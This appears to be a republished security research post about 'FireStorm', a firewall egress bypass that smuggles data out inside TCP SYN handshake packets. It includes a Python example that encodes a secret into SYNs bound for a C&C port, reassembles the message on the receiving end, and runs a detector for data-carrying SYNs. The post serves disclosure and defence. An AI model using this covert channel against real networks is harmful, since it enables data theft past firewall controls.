FireStorm: Severe Security Flaw Discovered in Next Generation Firewalls by David Leichner



BugSec Group and Cynet have discovered a severe vulnerability in Next Generation Firewalls. BugSec's Head of Offensive Security, Stas Volfus, uncovered the vulnerability, dubbed FireStorm, which allows an internal host, or malicious code running on one, to communicate with any host on the Internet and extract data out of the organization, bypassing the firewall's egress restrictions.

It was discovered that the firewalls are designed to permit a full TCP three-way handshake regardless of the packet's destination, because they need to see application-layer content (an HTTP request, a TLS ClientHello, a telnet banner and so on) before they can identify which application protocol a session carries. This applies whenever the policy depends on application identification, for example when the device is configured to allow Web browsing (HTTP/S) traffic from the LAN only to specific locations on the Internet (URL filtering). It holds even if only a single location is allowed: the handshake to every other destination is still completed before the session is evaluated.

This allowed us to complete a full TCP handshake on the HTTP port (TCP/80) with a C&C (Command and Control) server hosted by BugSec. From there, we were able to forge messages and tunnel them out inside the handshake packets themselves, reaching any destination on the Internet regardless of firewall rules and client restrictions.


It is important to mention that any traffic sent to the C&C server after the TCP handshake was blocked immediately by the firewall, since the policy engine categorized our session as “Unknown-TCP” and the destination wasn’t allowed for HTTP. Only the handshake packets themselves get through.

This flaw can be exploited by malware and attackers to communicate with unauthorized servers on the Internet by taking advantage of the ability to perform the TCP handshake with any destination. The channel is narrow, since each SYN carries only a small amount of data, but it is enough for command and control and for slow exfiltration, and it effectively removes the firewall's block between the LAN and the outside world.

Together with Chief Technology Officer Idan Cohen, the team created a tool (which won’t be disclosed) that extracts sensitive data from the LAN using only the TCP handshake. The tool allows full tunneling over the TCP handshake.

A simple example of the vulnerability can be demonstrated with a Python script located in the LAN and a sniffer located on the C&C server. The client script sends TCP SYN packets carrying the string “This is a secret…” to the C&C server, and the sniffer captures it. During our tests, we were able to successfully extract the data, proving the vulnerability.

Client script (Python):


After running the client-side Python script, this is the result on the server (using a tcpdump filter for SYN packets):


We disclosed the full details of the vulnerability to the major vendors affected by the flaw. One of the vendors who replied explained that they do not consider this issue a vulnerability because, by design, their firewall permits the full TCP handshake in order to inspect the application type.

They said that once their state machine proceeded beyond the TCP handshake, they would recognize the application, matching a subsequent rule that applied to application traffic. The vendor added that if there was an application they did not recognize, they would treat the session as ‘unknown-TCP’ and, again, perform an additional security policy lookup to decide whether to allow or block the traffic.

We believe that this is a dangerous vulnerability, and that monitoring capability should be added to the firewalls to block repeated suspicious handshake attempts and to block a direct connection between an internal host and an unauthenticated foreign host before the handshake completes.
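The client script and tcpdump capture from the original post are not reproduced on this page. As an added example that is not BugSec's script or undisclosed tool, the block below shows both halves of the SYN channel described above and the kind of monitoring rule this paragraph argues for: it builds raw TCP segments (header plus data, no IP layer, checksum left at zero), encodes a message as a series of SYNs whose sequence number carries the chunk index, reassembles it the way a sniffer on the C&C host would, and then runs a detector over the same segments that flags SYNs carrying data and bursts of SYNs that never reach the handshake ACK. Destination port 80, source port 40000, the 8-byte chunk size and the sample message are assumptions for the example; putting these segments on the wire would need a raw socket or scapy with root, and whether a given firewall forwards the SYN payload is the post's finding, not something this code tests. The detector is keyed by destination port only because the block carries TCP headers without IP addresses; a real sensor would key on the 4-tuple.

```python
import struct

# TCP flag bits (RFC 793 header, byte 13)
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def build_tcp_segment(src_port, dst_port, seq, flags, payload=b"", ack=0):
    """Build a bare TCP segment: 20-byte header (no options) followed by payload.
    The checksum is left at zero because no IP pseudo-header is involved here;
    a real sender (raw socket or scapy, root required) would fill it in."""
    header = struct.pack("!HHIIBBHHH",
                         src_port, dst_port, seq, ack,
                         5 << 4,        # data offset = 5 words, reserved bits 0
                         flags, 65535, 0, 0)
    return header + payload


def parse_tcp_segment(segment):
    """Decode the fixed TCP header and return the fields the functions below use."""
    src, dst, seq, ack, off_res, flags, _win, _chk, _urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    header_len = (off_res >> 4) * 4
    return {"src_port": src, "dst_port": dst, "seq": seq, "ack": ack,
            "flags": flags, "payload": segment[header_len:]}


def syn_exfil_segments(message, dst_port=80, src_port=40000, chunk=8):
    """Client side (LAN host): split the message into chunks and put each one
    in the data portion of its own SYN. The chunk index doubles as the initial
    sequence number so the receiver can reorder out-of-order captures.
    Port numbers and chunk size are assumptions for this example."""
    segments = []
    for index, offset in enumerate(range(0, len(message), chunk)):
        segments.append(build_tcp_segment(src_port + index, dst_port, index,
                                          SYN, message[offset:offset + chunk]))
    return segments


def reassemble_from_syns(segments, dst_port=80):
    """Server side (the sniffer on the C&C host): keep only pure SYNs to the
    expected port that carry data, order them by sequence number, and join."""
    chunks = {}
    for raw in segments:
        s = parse_tcp_segment(raw)
        if s["flags"] == SYN and s["dst_port"] == dst_port and s["payload"]:
            chunks[s["seq"]] = s["payload"]
    return b"".join(chunks[k] for k in sorted(chunks))


def detect_syn_smuggling(segments, syn_threshold=3):
    """Defender side: the monitoring the post argues for. Flags (a) any SYN
    that carries data, which ordinary clients do not send, and (b) a burst of
    SYNs to one destination port that never progresses to the handshake ACK.
    Keyed by destination port only because no IP header is modelled here."""
    findings = []
    syns_to = {}
    completed = set()
    for raw in segments:
        s = parse_tcp_segment(raw)
        if s["flags"] & SYN and not s["flags"] & ACK:
            syns_to[s["dst_port"]] = syns_to.get(s["dst_port"], 0) + 1
            if s["payload"]:
                findings.append("SYN to port %d carries %d bytes of data"
                                % (s["dst_port"], len(s["payload"])))
        elif s["flags"] & ACK and not s["flags"] & SYN:
            # third packet of a handshake (or later data) to this port
            completed.add(s["dst_port"])
    for port, count in sorted(syns_to.items()):
        if count >= syn_threshold and port not in completed:
            findings.append("%d SYNs to port %d without a completed handshake"
                            % (count, port))
    return findings


if __name__ == "__main__":
    secret = b"This is a secret..."      # constructed sample, like the post's string
    wire = syn_exfil_segments(secret)
    print(reassemble_from_syns(wire))    # the sniffer's view: the secret, reassembled
    for finding in detect_syn_smuggling(wire):
        print(finding)
```

Running the block reassembles the 19-byte sample from three SYNs and prints four findings: one per data-carrying SYN plus one for the burst that never completed a handshake. A normal SYN, SYN/ACK, ACK exchange to the same port produces no findings, which is the distinction a firewall vendor would need to draw to act on repeated handshake attempts without breaking ordinary clients.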


Bugsec Blog

This article was originally published on LinkedIn. You can find it here: LinkedIn

January 26, 2016


Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023